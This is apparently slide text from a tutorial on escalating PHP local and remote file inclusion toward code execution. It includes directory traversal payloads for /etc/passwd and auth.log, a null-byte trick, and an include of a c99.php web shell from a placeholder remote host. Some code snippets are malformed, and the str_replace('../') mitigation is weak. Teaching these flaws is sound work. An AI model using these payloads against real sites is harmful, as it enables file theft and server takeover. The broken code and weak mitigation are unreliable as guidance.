This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
6. #Local File Inclusion
Local File Inclusion is the process of including files on
a server through the web browser. This vulnerability
occurs when a page include is not properly sanitized,
and allows directory traversal characters to be injected.
<?php
$page=$_GET[“page”];
include($_GET[“$page”]); Vulnerable !!
?>
7. #Local File Inclusion
What if the attacker assigns page to be
"../../../../etc/passwd". It causes the attacker to read a
content from /etc/passwd.
Vulnerable Function’s leads to LFI
-include()
-include_once()
-require()
-require_once()
-fopen()
9. #Local File Inclusion
<?php
if($_GET[“page”]) {
$file = preg_replace(‘/x00.*/’, “” ,$file);
include($file);
}
?>
o In This Case we may use terminator’s(%00) to execute LFI
Eg: ?page=../../../../../../../../var/log/auth.log%00
11. #Remote File Inclusion
RFI stands for Remote File Inclusion that allows the attacker to
upload a custom coded/malicious file on a website or server. The
vulnerability exploit the poor validation checks in websites and
can eventually lead to code execution on server or code execution
on website (XSS attack using JavaScript).
<?php
$file ="http://Somesite/c99.php?"; //$_GET['page'];
include($file .".php"); //include (http://Somesite/C99.php?.php)
?>
12. #Prevention
Do not permit appending file paths directly.
Use str_replace(‘../’, ‘ ’, $_GET[‘file’]);
If you definitely need dynamic path concatenation,
ensure you only accept required characters such as "a-Z
0-9" and do not allow ".." or "/" or "%00" (null byte) or
any other similar unexpected characters.